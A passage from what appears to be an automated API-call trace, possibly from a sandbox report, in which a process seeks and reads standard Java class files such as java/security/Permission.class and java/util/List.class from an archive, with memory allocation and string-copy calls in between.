hFile=0x134, liDistanceToMove=0x341dd0d, lpNewFilePointer=0x208db30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db30*=54648077) returned 1 [0091.821] ReadFile (in: hFile=0x134, lpBuffer=0x121dc840, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db00, lpOverlapped=0x0 | out: lpBuffer=0x121dc840*, lpNumberOfBytesRead=0x208db00*=0xa0, lpOverlapped=0x0) returned 1 [0091.821] malloc (_Size=0x1b) returned 0x121d7e20 [0091.822] free (_Block=0x121dc840) [0091.822] strlen (_Str="java/util/Comparator.class") returned 0x1a [0091.822] strcpy (in: _Dest=0x208dcb0, _Source="java/util/Comparator.class" | out: _Dest="java/util/Comparator.class") returned="java/util/Comparator.class" [0091.822] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d5c02, lpNewFilePointer=0x208d730, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d730*=52255746) returned 1 [0091.822] ReadFile (in: hFile=0x134, lpBuffer=0x208d780, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d700, lpOverlapped=0x0 | out: lpBuffer=0x208d780*, lpNumberOfBytesRead=0x208d700*=0x1e, lpOverlapped=0x0) returned 1 [0091.833] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d5c3a, lpNewFilePointer=0x208d790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d790*=52255802) returned 1 [0091.833] ReadFile (in: hFile=0x134, lpBuffer=0x2103070, nNumberOfBytesToRead=0x1bb1, lpNumberOfBytesRead=0x208d760, lpOverlapped=0x0 | out: lpBuffer=0x2103070*, lpNumberOfBytesRead=0x208d760*=0x1bb1, lpOverlapped=0x0) returned 1 [0091.838] free (_Block=0x121da170) [0091.838] free (_Block=0x121d9030) [0091.857] malloc (_Size=0x48) returned 0x121d9080 [0091.857] malloc (_Size=0xa0) returned 0x121dc840 [0091.857] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dcbe, lpNewFilePointer=0x208e5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5f0*=54647998) returned 1 [0091.857] ReadFile (in: hFile=0x134, lpBuffer=0x121dc840, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc840*, lpNumberOfBytesRead=0x208e5c0*=0xa0, lpOverlapped=0x0) returned 1 [0091.857] malloc (_Size=0x22) returned 0x121d7e50 [0091.858] free (_Block=0x121dc840) [0091.858] strlen (_Str="java/lang/RuntimePermission.class") returned 0x21 [0091.858] strcpy (in: _Dest=0x208e770, _Source="java/lang/RuntimePermission.class" | out: _Dest="java/lang/RuntimePermission.class") returned="java/lang/RuntimePermission.class" [0091.858] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d5a80, lpNewFilePointer=0x208e1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1f0*=52255360) returned 1 [0091.858] ReadFile (in: hFile=0x134, lpBuffer=0x208e240, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1c0, lpOverlapped=0x0 | out: lpBuffer=0x208e240*, lpNumberOfBytesRead=0x208e1c0*=0x1e, lpOverlapped=0x0) returned 1 [0091.858] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d5abf, lpNewFilePointer=0x208e250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e250*=52255423) returned 1 [0091.858] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x143, lpNumberOfBytesRead=0x208e220, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208e220*=0x143, lpOverlapped=0x0) returned 1 [0091.858] free (_Block=0x121d7e20) [0091.859] free (_Block=0x121d92b0) [0091.862] strlen (_Str="java/security/BasicPermission.class") returned 0x23 [0091.862] malloc (_Size=0x48) returned 0x121d93a0 [0091.862] malloc (_Size=0xa0) returned 0x121dc840 [0091.862] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dc6d, lpNewFilePointer=0x208dbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbb0*=54647917) returned 1 [0091.862] ReadFile (in: hFile=0x134, lpBuffer=0x121dc840, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db80, lpOverlapped=0x0 | out: lpBuffer=0x121dc840*, lpNumberOfBytesRead=0x208db80*=0xa0, lpOverlapped=0x0) returned 1 [0091.862] malloc (_Size=0x24) returned 0x121d7bb0 [0091.862] free (_Block=0x121dc840) [0091.863] strlen (_Str="java/security/BasicPermission.class") returned 0x23 [0091.863] strcpy (in: _Dest=0x208dd30, _Source="java/security/BasicPermission.class" | out: _Dest="java/security/BasicPermission.class") returned="java/security/BasicPermission.class" [0091.863] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d5259, lpNewFilePointer=0x208d7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7b0*=52253273) returned 1 [0091.863] ReadFile (in: hFile=0x134, lpBuffer=0x208d800, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d780, lpOverlapped=0x0 | out: lpBuffer=0x208d800*, lpNumberOfBytesRead=0x208d780*=0x1e, lpOverlapped=0x0) returned 1 [0091.863] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d529a, lpNewFilePointer=0x208d810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d810*=52253338) returned 1 [0091.863] ReadFile (in: hFile=0x134, lpBuffer=0x2102b80, nNumberOfBytesToRead=0x7e6, lpNumberOfBytesRead=0x208d7e0, lpOverlapped=0x0 | out: lpBuffer=0x2102b80*, lpNumberOfBytesRead=0x208d7e0*=0x7e6, lpOverlapped=0x0) returned 1 [0091.863] free (_Block=0x121d7e50) [0091.864] free (_Block=0x121d9080) [0091.868] strlen (_Str="java/security/Permission.class") returned 0x1e [0091.869] malloc (_Size=0x48) returned 0x121d98f0 [0091.869] malloc (_Size=0xa0) returned 0x121dc840 [0091.869] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dc21, lpNewFilePointer=0x208d170, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d170*=54647841) returned 1 [0091.869] ReadFile (in: hFile=0x134, lpBuffer=0x121dc840, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d140, lpOverlapped=0x0 | out: lpBuffer=0x121dc840*, lpNumberOfBytesRead=0x208d140*=0xa0, lpOverlapped=0x0) returned 1 [0091.869] malloc (_Size=0x1f) returned 0x121d7b20 [0091.869] free (_Block=0x121dc840) [0091.870] strlen (_Str="java/security/Permission.class") returned 0x1e [0091.870] strcpy (in: _Dest=0x208d2f0, _Source="java/security/Permission.class" | out: _Dest="java/security/Permission.class") returned="java/security/Permission.class" [0091.870] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d4cad, lpNewFilePointer=0x208cd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd70*=52251821) returned 1 [0091.870] ReadFile (in: hFile=0x134, lpBuffer=0x208cdc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd40, lpOverlapped=0x0 | out: lpBuffer=0x208cdc0*, lpNumberOfBytesRead=0x208cd40*=0x1e, lpOverlapped=0x0) returned 1 [0091.873] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d4ce9, lpNewFilePointer=0x208cdd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdd0*=52251881) returned 1 [0091.874] ReadFile (in: hFile=0x134, lpBuffer=0x2103500, nNumberOfBytesToRead=0x570, lpNumberOfBytesRead=0x208cda0, lpOverlapped=0x0 | out: lpBuffer=0x2103500*, lpNumberOfBytesRead=0x208cda0*=0x570, lpOverlapped=0x0) returned 1 [0091.874] free (_Block=0x121d7bb0) [0091.875] free (_Block=0x121d93a0) [0091.876] strlen (_Str="java/security/Guard.class") returned 0x19 [0091.876] malloc (_Size=0x48) returned 0x121d9210 [0091.876] malloc (_Size=0xa0) returned 0x121dc840 [0091.876] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dbda, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=54647770) returned 1 [0091.876] ReadFile (in: hFile=0x134, lpBuffer=0x121dc840, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x121dc840*, lpNumberOfBytesRead=0x208c680*=0xa0, lpOverlapped=0x0) returned 1 [0091.876] malloc (_Size=0x1a) returned 0x121d7d00 [0091.877] free (_Block=0x121dc840) [0091.877] strlen (_Str="java/security/Guard.class") returned 0x19 [0091.877] strcpy (in: _Dest=0x208c830, _Source="java/security/Guard.class" | out: _Dest="java/security/Guard.class") returned="java/security/Guard.class" [0091.877] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d4bca, lpNewFilePointer=0x208c2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2b0*=52251594) returned 1 [0091.877] ReadFile (in: hFile=0x134, lpBuffer=0x208c300, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c280, lpOverlapped=0x0 | out: lpBuffer=0x208c300*, lpNumberOfBytesRead=0x208c280*=0x1e, lpOverlapped=0x0) returned 1 [0091.877] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d4c01, lpNewFilePointer=0x208c310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c310*=52251649) returned 1 [0091.877] ReadFile (in: hFile=0x134, lpBuffer=0x2103c00, nNumberOfBytesToRead=0xac, lpNumberOfBytesRead=0x208c2e0, lpOverlapped=0x0 | out: lpBuffer=0x2103c00*, lpNumberOfBytesRead=0x208c2e0*=0xac, lpOverlapped=0x0) returned 1 [0091.877] free (_Block=0x121d7b20) [0091.878] free (_Block=0x121d98f0) [0091.899] strlen (_Str="java/security/AccessController.class") returned 0x24 [0091.900] malloc (_Size=0x48) returned 0x121d9120 [0091.900] malloc (_Size=0xa0) returned 0x121dc840 [0091.900] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341db88, lpNewFilePointer=0x208e2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2c0*=54647688) returned 1 [0091.900] ReadFile (in: hFile=0x134, lpBuffer=0x121dc840, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e290, lpOverlapped=0x0 | out: lpBuffer=0x121dc840*, lpNumberOfBytesRead=0x208e290*=0xa0, lpOverlapped=0x0) returned 1 [0091.900] malloc (_Size=0x25) returned 0x121d7e20 [0091.900] free (_Block=0x121dc840) [0091.900] strlen (_Str="java/security/AccessController.class") returned 0x24 [0091.901] strcpy (in: _Dest=0x208e440, _Source="java/security/AccessController.class" | out: _Dest="java/security/AccessController.class") returned="java/security/AccessController.class" [0091.901] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d35fc, lpNewFilePointer=0x208dec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dec0*=52246012) returned 1 [0091.901] ReadFile (in: hFile=0x134, lpBuffer=0x208df10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208de90, lpOverlapped=0x0 | out: lpBuffer=0x208df10*, lpNumberOfBytesRead=0x208de90*=0x1e, lpOverlapped=0x0) returned 1 [0091.937] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d363e, lpNewFilePointer=0x208df20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df20*=52246078) returned 1 [0091.937] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x158c, lpNumberOfBytesRead=0x208def0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208def0*=0x158c, lpOverlapped=0x0) returned 1 [0091.937] free (_Block=0x121d7d00) [0091.938] free (_Block=0x121d9210) [0091.985] malloc (_Size=0x48) returned 0x121d9080 [0091.985] malloc (_Size=0xa0) returned 0x121dc980 [0091.985] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341db31, lpNewFilePointer=0x208e2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2f0*=54647601) returned 1 [0091.985] ReadFile (in: hFile=0x134, lpBuffer=0x121dc980, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc980*, lpNumberOfBytesRead=0x208e2c0*=0xa0, lpOverlapped=0x0) returned 1 [0091.985] malloc (_Size=0x2a) returned 0x121da170 [0091.986] free (_Block=0x121dc980) [0091.986] strlen (_Str="java/lang/reflect/ReflectPermission.class") returned 0x29 [0091.986] strcpy (in: _Dest=0x208e470, _Source="java/lang/reflect/ReflectPermission.class" | out: _Dest="java/lang/reflect/ReflectPermission.class") returned="java/lang/reflect/ReflectPermission.class" [0091.986] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d346a, lpNewFilePointer=0x208def0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208def0*=52245610) returned 1 [0091.986] ReadFile (in: hFile=0x134, lpBuffer=0x208df40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dec0, lpOverlapped=0x0 | out: lpBuffer=0x208df40*, lpNumberOfBytesRead=0x208dec0*=0x1e, lpOverlapped=0x0) returned 1 [0091.986] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d34b1, lpNewFilePointer=0x208df50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df50*=52245681) returned 1 [0091.986] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x14b, lpNumberOfBytesRead=0x208df20, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208df20*=0x14b, lpOverlapped=0x0) returned 1 [0091.987] free (_Block=0x121d7e20) [0091.987] free (_Block=0x121d9120) [0091.992] strlen (_Str="sun/reflect/ReflectionFactory$GetReflectionFactoryAction.class") returned 0x3e [0091.992] malloc (_Size=0x48) returned 0x121d99e0 [0091.992] malloc (_Size=0xa0) returned 0x121dc980 [0091.992] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dac5, lpNewFilePointer=0x208e2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2f0*=54647493) returned 1 [0091.992] ReadFile (in: hFile=0x134, lpBuffer=0x121dc980, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc980*, lpNumberOfBytesRead=0x208e2c0*=0xa0, lpOverlapped=0x0) returned 1 [0091.993] malloc (_Size=0x3f) returned 0x121d9440 [0091.993] free (_Block=0x121dc980) [0091.993] strlen (_Str="sun/reflect/ReflectionFactory$GetReflectionFactoryAction.class") returned 0x3e [0091.993] strcpy (in: _Dest=0x208e470, _Source="sun/reflect/ReflectionFactory$GetReflectionFactoryAction.class" | out: _Dest="sun/reflect/ReflectionFactory$GetReflectionFactoryAction.class") returned="sun/reflect/ReflectionFactory$GetReflectionFactoryAction.class" [0091.993] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d31cb, lpNewFilePointer=0x208def0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208def0*=52244939) returned 1 [0091.993] ReadFile (in: hFile=0x134, lpBuffer=0x208df40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dec0, lpOverlapped=0x0 | out: lpBuffer=0x208df40*, lpNumberOfBytesRead=0x208dec0*=0x1e, lpOverlapped=0x0) returned 1 [0091.994] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d3227, lpNewFilePointer=0x208df50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df50*=52245031) returned 1 [0091.994] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x243, lpNumberOfBytesRead=0x208df20, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208df20*=0x243, lpOverlapped=0x0) returned 1 [0091.994] free (_Block=0x121da170) [0091.994] free (_Block=0x121d9080) [0092.006] strlen (_Str="java/security/PrivilegedAction.class") returned 0x24 [0092.007] malloc (_Size=0x48) returned 0x121d9120 [0092.007] malloc (_Size=0xa0) returned 0x121dc980 [0092.007] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341da73, lpNewFilePointer=0x208d830, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d830*=54647411) returned 1 [0092.007] ReadFile (in: hFile=0x134, lpBuffer=0x121dc980, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d800, lpOverlapped=0x0 | out: lpBuffer=0x121dc980*, lpNumberOfBytesRead=0x208d800*=0xa0, lpOverlapped=0x0) returned 1 [0092.007] malloc (_Size=0x25) returned 0x121d7e80 [0092.007] free (_Block=0x121dc980) [0092.008] strlen (_Str="java/security/PrivilegedAction.class") returned 0x24 [0092.008] strcpy (in: _Dest=0x208d9b0, _Source="java/security/PrivilegedAction.class" | out: _Dest="java/security/PrivilegedAction.class") returned="java/security/PrivilegedAction.class" [0092.008] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d30c3, lpNewFilePointer=0x208d430, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d430*=52244675) returned 1 [0092.008] ReadFile (in: hFile=0x134, lpBuffer=0x208d480, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d400, lpOverlapped=0x0 | out: lpBuffer=0x208d480*, lpNumberOfBytesRead=0x208d400*=0x1e, lpOverlapped=0x0) returned 1 [0092.008] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d3105, lpNewFilePointer=0x208d490, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d490*=52244741) returned 1 [0092.008] ReadFile (in: hFile=0x134, lpBuffer=0x2102e20, nNumberOfBytesToRead=0xc6, lpNumberOfBytesRead=0x208d460, lpOverlapped=0x0 | out: lpBuffer=0x2102e20*, lpNumberOfBytesRead=0x208d460*=0xc6, lpOverlapped=0x0) returned 1 [0092.009] free (_Block=0x121d9440) [0092.009] free (_Block=0x121d99e0) [0092.018] strlen (_Str="java/security/cert/Certificate.class") returned 0x24 [0092.018] malloc (_Size=0x48) returned 0x121d99e0 [0092.018] malloc (_Size=0xa0) returned 0x121dc980 [0092.018] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341da21, lpNewFilePointer=0x208d7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7f0*=54647329) returned 1 [0092.018] ReadFile (in: hFile=0x134, lpBuffer=0x121dc980, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc980*, lpNumberOfBytesRead=0x208d7c0*=0xa0, lpOverlapped=0x0) returned 1 [0092.019] malloc (_Size=0x25) returned 0x121d7ac0 [0092.019] free (_Block=0x121dc980) [0092.019] strlen (_Str="java/security/cert/Certificate.class") returned 0x24 [0092.019] strcpy (in: _Dest=0x208d970, _Source="java/security/cert/Certificate.class" | out: _Dest="java/security/cert/Certificate.class") returned="java/security/cert/Certificate.class" [0092.019] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d2876, lpNewFilePointer=0x208d3f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3f0*=52242550) returned 1 [0092.019] ReadFile (in: hFile=0x134, lpBuffer=0x208d440, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3c0, lpOverlapped=0x0 | out: lpBuffer=0x208d440*, lpNumberOfBytesRead=0x208d3c0*=0x1e, lpOverlapped=0x0) returned 1 [0092.089] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d28b8, lpNewFilePointer=0x208d450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d450*=52242616) returned 1 [0092.089] ReadFile (in: hFile=0x134, lpBuffer=0x2102a60, nNumberOfBytesToRead=0x80b, lpNumberOfBytesRead=0x208d420, lpOverlapped=0x0 | out: lpBuffer=0x2102a60*, lpNumberOfBytesRead=0x208d420*=0x80b, lpOverlapped=0x0) returned 1 [0092.089] free (_Block=0x121d7e80) [0092.090] free (_Block=0x121d9120) [0092.096] strlen (_Str="java/util/Vector.class") returned 0x16 [0092.096] malloc (_Size=0x48) returned 0x121d9440 [0092.096] malloc (_Size=0xa0) returned 0x121dc980 [0092.096] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d9dd, lpNewFilePointer=0x208d7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7f0*=54647261) returned 1 [0092.096] ReadFile (in: hFile=0x134, lpBuffer=0x121dc980, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc980*, lpNumberOfBytesRead=0x208d7c0*=0xa0, lpOverlapped=0x0) returned 1 [0092.096] malloc (_Size=0x17) returned 0x121d70e0 [0092.097] free (_Block=0x121dc980) [0092.097] strlen (_Str="java/util/Vector.class") returned 0x16 [0092.097] strcpy (in: _Dest=0x208d970, _Source="java/util/Vector.class" | out: _Dest="java/util/Vector.class") returned="java/util/Vector.class" [0092.097] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d0065, lpNewFilePointer=0x208d3f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3f0*=52232293) returned 1 [0092.097] ReadFile (in: hFile=0x134, lpBuffer=0x208d440, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3c0, lpOverlapped=0x0 | out: lpBuffer=0x208d440*, lpNumberOfBytesRead=0x208d3c0*=0x1e, lpOverlapped=0x0) returned 1 [0092.164] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d0099, lpNewFilePointer=0x208d450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d450*=52232345) returned 1 [0092.164] ReadFile (in: hFile=0x134, lpBuffer=0x2102a50, nNumberOfBytesToRead=0x27dd, lpNumberOfBytesRead=0x208d420, lpOverlapped=0x0 | out: lpBuffer=0x2102a50*, lpNumberOfBytesRead=0x208d420*=0x27dd, lpOverlapped=0x0) returned 1 [0092.361] free (_Block=0x121d7ac0) [0092.361] free (_Block=0x121d99e0) [0092.364] strlen (_Str="java/util/List.class") returned 0x14 [0092.364] malloc (_Size=0x48) returned 0x121d9ad0 [0092.364] malloc (_Size=0xa0) returned 0x121de990 [0092.364] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d99b, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=54647195) returned 1 [0092.364] ReadFile (in: hFile=0x134, lpBuffer=0x121de990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x121de990*, lpNumberOfBytesRead=0x208cd00*=0xa0, lpOverlapped=0x0) returned 1 [0092.364] malloc (_Size=0x15) returned 0x121d7080 [0092.365] free (_Block=0x121de990) [0092.365] strlen (_Str="java/util/List.class") returned 0x14 [0092.365] strcpy (in: _Dest=0x208ceb0, _Source="java/util/List.class" | out: _Dest="java/util/List.class") returned="java/util/List.class" [0092.365] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cf6b0, lpNewFilePointer=0x208c930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c930*=52229808) returned 1 [0092.365] ReadFile (in: hFile=0x134, lpBuffer=0x208c980, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c900, lpOverlapped=0x0 | out: lpBuffer=0x208c980*, lpNumberOfBytesRead=0x208c900*=0x1e, lpOverlapped=0x0) returned 1 [0092.503] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cf6e2, lpNewFilePointer=0x208c990, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c990*=52229858) returned 1 [0092.503] ReadFile (in: hFile=0x134, lpBuffer=0x21053a0, nNumberOfBytesToRead=0x983, lpNumberOfBytesRead=0x208c960, lpOverlapped=0x0 | out: lpBuffer=0x21053a0*, lpNumberOfBytesRead=0x208c960*=0x983, lpOverlapped=0x0) returned 1 [0092.504] free (_Block=0x121d70e0) [0092.504] free (_Block=0x121d9440) [0092.507] strlen (_Str="java/util/Collection.class") returned 0x1a [0092.507] malloc (_Size=0x48) returned 0x121d9c60 [0092.507] malloc (_Size=0xa0) returned 0x121de990 [0092.507] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d953, lpNewFilePointer=0x208c270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c270*=54647123) returned 1 [0092.507] ReadFile (in: hFile=0x134, lpBuffer=0x121de990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c240, lpOverlapped=0x0 | out: lpBuffer=0x121de990*, lpNumberOfBytesRead=0x208c240*=0xa0, lpOverlapped=0x0) returned 1 [0092.507] malloc (_Size=0x1b) returned 0x121d7e20 [0092.508] free (_Block=0x121de990) [0092.508] strlen (_Str="java/util/Collection.class") returned 0x1a [0092.508] strcpy (in: _Dest=0x208c3f0, _Source="java/util/Collection.class" | out: _Dest="java/util/Collection.class") returned="java/util/Collection.class" [0092.508] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cef9c, lpNewFilePointer=0x208be70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be70*=52227996) returned 1 [0092.508] ReadFile (in: hFile=0x134, lpBuffer=0x208bec0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be40, lpOverlapped=0x0 | out: lpBuffer=0x208bec0*, lpNumberOfBytesRead=0x208be40*=0x1e, lpOverlapped=0x0) returned 1 [0092.513] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cefd4, lpNewFilePointer=0x208bed0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bed0*=52228052) returned 1 [0092.513] ReadFile (in: hFile=0x134, lpBuffer=0x2105ec0, nNumberOfBytesToRead=0x6dc, lpNumberOfBytesRead=0x208bea0, lpOverlapped=0x0 | out: lpBuffer=0x2105ec0*, lpNumberOfBytesRead=0x208bea0*=0x6dc, lpOverlapped=0x0) returned 1 [0092.513] free (_Block=0x121d7080) [0092.513] free (_Block=0x121d9ad0) [0092.515] strlen (_Str="java/lang/Iterable.class") returned 0x18 [0092.515] malloc (_Size=0x48) returned 0x121d98f0 [0092.515] malloc (_Size=0xa0) returned 0x121de990 [0092.515] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d90d, lpNewFilePointer=0x208b7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7b0*=54647053) returned 1 [0092.515] ReadFile (in: hFile=0x134, lpBuffer=0x121de990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b780, lpOverlapped=0x0 | out: lpBuffer=0x121de990*, lpNumberOfBytesRead=0x208b780*=0xa0, lpOverlapped=0x0) returned 1 [0092.515] malloc (_Size=0x19) returned 0x121d7ee0 [0092.516] free (_Block=0x121de990) [0092.516] strlen (_Str="java/lang/Iterable.class") returned 0x18 [0092.516] strcpy (in: _Dest=0x208b930, _Source="java/lang/Iterable.class" | out: _Dest="java/lang/Iterable.class") returned="java/lang/Iterable.class" [0092.516] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cebd5, lpNewFilePointer=0x208b3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b3b0*=52227029) returned 1 [0092.516] ReadFile (in: hFile=0x134, lpBuffer=0x208b400, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b380, lpOverlapped=0x0 | out: lpBuffer=0x208b400*, lpNumberOfBytesRead=0x208b380*=0x1e, lpOverlapped=0x0) returned 1 [0092.516] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cec0b, lpNewFilePointer=0x208b410, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b410*=52227083) returned 1 [0092.516] ReadFile (in: hFile=0x134, lpBuffer=0x2106730, nNumberOfBytesToRead=0x391, lpNumberOfBytesRead=0x208b3e0, lpOverlapped=0x0 | out: lpBuffer=0x2106730*, lpNumberOfBytesRead=0x208b3e0*=0x391, lpOverlapped=0x0) returned 1 [0092.517] free (_Block=0x121d7e20) [0092.517] free (_Block=0x121d9c60) [0092.525] malloc (_Size=0x48) returned 0x121d9710 [0092.525] malloc (_Size=0xa0) returned 0x121de990 [0092.525] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d8c3, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=54646979) returned 1 [0092.525] ReadFile (in: hFile=0x134, lpBuffer=0x121de990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x121de990*, lpNumberOfBytesRead=0x208cd00*=0xa0, lpOverlapped=0x0) returned 1 [0092.525] malloc (_Size=0x1d) returned 0x121d7eb0 [0092.525] free (_Block=0x121de990) [0092.526] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ceb51, lpNewFilePointer=0x208c930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c930*=52226897) returned 1 [0092.526] ReadFile (in: hFile=0x134, lpBuffer=0x208c980, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c900, lpOverlapped=0x0 | out: lpBuffer=0x208c980*, lpNumberOfBytesRead=0x208c900*=0x1e, lpOverlapped=0x0) returned 1 [0092.526] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ceb8b, 